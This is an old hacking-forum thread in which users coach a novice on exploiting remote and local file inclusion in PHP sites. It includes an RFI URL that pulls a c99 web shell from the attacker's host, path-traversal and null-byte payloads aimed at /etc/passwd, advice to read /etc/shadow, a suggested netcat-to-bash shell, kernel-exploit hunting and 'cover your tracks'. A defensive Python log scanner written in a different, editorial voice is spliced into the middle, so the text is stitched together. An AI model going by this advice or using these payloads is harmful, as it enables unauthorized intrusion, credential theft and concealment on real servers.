noobish post. :D

Posted: Tue Aug 05, 2008 10:40 am
sol1dzer0 (Regular user; Joined: Jan 21, 2008; Posts: 24)
So I have some questions..
1. The first one is about RFI. If I have found an RFI vuln site [at least I think so], what should I do next?!
I have made a host and uploaded c99 to it.. and did something like this..
www.vulnsyte.com/index.php?page=http://www.myhost.com/c99.php
but it seems nothing happens.. -.-' ! For RFI there are not many tuts that I have found -.- so I'm a total newb to this.. !
* What are the most common errors which lead to RFI?! It would be nice if you could show me examples like in SQL inj. ''You have an error in your SQL syntax''
* What is the usual next step in RFI?! Always upload some shell / script or something?! I don't quite get it.. ;/
* What should I know to understand RFI better? 0_o Maybe someone has some good tutorials about this?! [What I know: I need to know all about the victim, e.g. what OS is running, is there PHP, HTML or FP running, etc.]
2. Rooting.. hmm yea.. a total 0 for me.. would be nice if I get redirected to some good tutorial.. something like Rooting for n00bs!! What it is, what I can do with it.. ex.
So I hope I get some help with this.. !
Thank you.
Posted: Tue Aug 05, 2008 11:09 am
lenny (Valuable expert; Joined: May 15, 2008; Posts: 275)
Well, are you sure the page is vulnerable to RFI? index.php may have a set of filters to strip out the ":" of "http://", or in fact any URL altogether. Their host may also be set up to disable URL-based includes (which is quite common). I believe that URL-based includes are OFF in php.ini by default. Those could be your two main problems with your attack currently!
If you do manage to get an include, be sure to upload a shell - just keep it simple. Don't leave files on their server that are unnecessary, or you will arouse their suspicions. My usual approach (strictly lab-based attacks, and for pen testing) is to start a netcat instance on their server forwarding to bash - essentially it allows me shell access in a more convenient environment than through a PHP script! From your makeshift SSH server, you can get to work looking at other exploits, for example in the kernel. Be sure to cover your tracks!
I suppose all that is pretty confusing, so ask away your questions - I'm here all week.
Posted: Tue Aug 05, 2008 11:58 am
oniric (Advanced user; Joined: Jul 24, 2008; Posts: 65)
A rooting paper would be useful for me too ^_^
Probably PHP is configured to not allow remote file inclusion through HTTP or other net protocols. It's very, very common nowadays, like lenny said. Such vulns come from code like this:
include "../my/path/.".$_GET['page'].".php";
In such situations you could exploit this to load files that are outside the htdocs folder of the webserver. And you can load files with other extensions besides the .php that is automatically added by the code, by adding a NULL byte to your request like so:
http://vulnsite.com/index.php?page=../../etc/passwd%00
That's only an example; also you probably need to urlencode the slashes. Please note the use of ../ to traverse the file system backward.
Yes, it's better if you know the victim OS so you can easily locate files on the file system. Just play with paths and directory traversal, looking for known file locations like /etc/passwd on Linux systems. When you have such information you can start harvesting other useful information from other files, and maybe, if the server is running as root, open the /etc/shadow file.
Posted: Tue Aug 05, 2008 12:43 pm
sol1dzer0 (Regular user; Joined: Jan 21, 2008; Posts: 24)
Thank you guys, hmm, a bit hard to understand this but I will try to learn ;] This is not as easy as SQL injection lol, but I thought the same about SQL injection when I didn't know anything.. ;] ! Thanks in advance.. if you two or anybody have something more to say plzz reply ;]
more info = better success
Posted: Tue Aug 05, 2008 1:06 pm
oniric (Advanced user; Joined: Jul 24, 2008; Posts: 65)
Mmm, I think SQLi is far more difficult ^_^ You need to know SQL, not always but in many cases.
One thing more: the NULL byte, %00, works because it's the urlencoded version of \0, the C/C++ NULL byte, also known as the string terminator. So if the string sequence is
mystring%00isasd
PHP would "see" only mystring.
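To make the two points above concrete (the concatenated include in oniric's earlier post and the %00 terminator here), this is an added example, not code from the thread: a small Python log check, written from the defender's side, that flags the kinds of `page` values discussed in the thread, plus a fixed allowlist lookup as the hardened alternative to string concatenation. The access-log lines, IP address and allowlist are constructed; the request paths reuse the URLs quoted in the thread.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not real traffic); the request paths
# mirror the URLs quoted in the thread.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Aug/2008:10:40:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
203.0.113.5 - - [05/Aug/2008:10:41:13 +0000] "GET /index.php?page=http://www.myhost.com/c99.php HTTP/1.1" 200 512
203.0.113.5 - - [05/Aug/2008:10:42:07 +0000] "GET /index.php?page=../../etc/passwd%00 HTTP/1.1" 200 1203
203.0.113.5 - - [05/Aug/2008:10:43:22 +0000] "GET /index.php?page=..%2F..%2Fetc%2Fpasswd%2500 HTTP/1.1" 200 1203
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def classify_page(value):
    """Return the suspicious traits of a `page` parameter value."""
    # Decode twice: slashes may arrive URL-encoded, and a double-encoded
    # %2500 only becomes a real NUL after the second pass.
    decoded = unquote(unquote(value))
    traits = []
    if re.match(r'^[a-z][a-z0-9+.-]*://', decoded, re.I):
        traits.append("remote_url")   # RFI shape: a URL handed to include
    if "../" in decoded or "..\\" in decoded:
        traits.append("traversal")    # LFI shape: walking out of htdocs
    if "\x00" in decoded:
        traits.append("null_byte")    # cuts off the appended ".php"
    return traits

def scan_log(text):
    """Return (request_path, traits) for each request with a hostile-looking page value."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group(1)).query)
        for value in query.get("page", []):
            traits = classify_page(value)
            if traits:
                findings.append((m.group(1), traits))
    return findings

ALLOWED_PAGES = {"home", "about", "contact"}  # constructed allowlist

def resolve_page(value):
    # Hardened counterpart to concatenating $_GET['page'] into the include path:
    # the parameter selects from a fixed set of names and is never used as a path.
    decoded = unquote(unquote(value))
    return f"pages/{decoded}.php" if decoded in ALLOWED_PAGES else None
```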
Posted: Tue Aug 05, 2008 1:13 pm
sol1dzer0 (Regular user; Joined: Jan 21, 2008; Posts: 24)
oniric wrote:
    Mmm, I think SQLi is far more difficult ^_^ You need to know SQL, not always but in many cases.
    One thing more: the NULL byte, %00, works because it's the urlencoded version of \0, the C/C++ NULL byte, also known as the string terminator. So if the string sequence is
    mystring%00isasd
    PHP would "see" only mystring.

Nooo, SQL inj is much easier than this ;] ! I can PM good tuts on it if you need them xDD !! ;] %00, ok, will keep that in mind.
Posted: Tue Aug 05, 2008 1:18 pm
oniric (Advanced user; Joined: Jul 24, 2008; Posts: 65)
Ah no, thx, SQLi is my field ^_^ I really like it, and exploiting it is such fun.
Posted: Tue Aug 05, 2008 1:23 pm
lenny (Valuable expert; Joined: May 15, 2008; Posts: 275)
I try to stay away from SQL injection, I really dislike it! I prefer something more solid, and that includes social engineering! It is a valid form of hacking, and it has served me well (and solidly) on many occasions!
Anyway, do you need any more information? Or should that suffice for now? Keep us informed, we can always help out if you need further assistance!
Posted: Tue Aug 05, 2008 2:02 pm
sol1dzer0 (Regular user; Joined: Jan 21, 2008; Posts: 24)
Yea, somebody likes SQL and somebody dislikes it! ;]
And about RFI, right now it's ok, I will try to read some more stuff and learn more ;] ! Maybe someone in IRC will help me ;D
BTW I cannot connect to this site's IRC channel.. plugin missing and I cannot download it.. -.-' damn.. wanted to talk with you guys!!
Anyway, thank you all!! You are kind ppl!
Posted: Tue Aug 05, 2008 2:15 pm
oniric (Advanced user; Joined: Jul 24, 2008; Posts: 65)
Or LFI, which is more common. Probably your best bet, as I and lenny said, since RFI in PHP is no longer so common. There's a setting in php.ini, called allow_url_fopen, that's commonly set to Off. And also, if the code is like
include "somethinghere".$_GET['page'];
you can't overwrite the somethinghere part, so you can't call external HTTP files in such a case (very common).
All times are GMT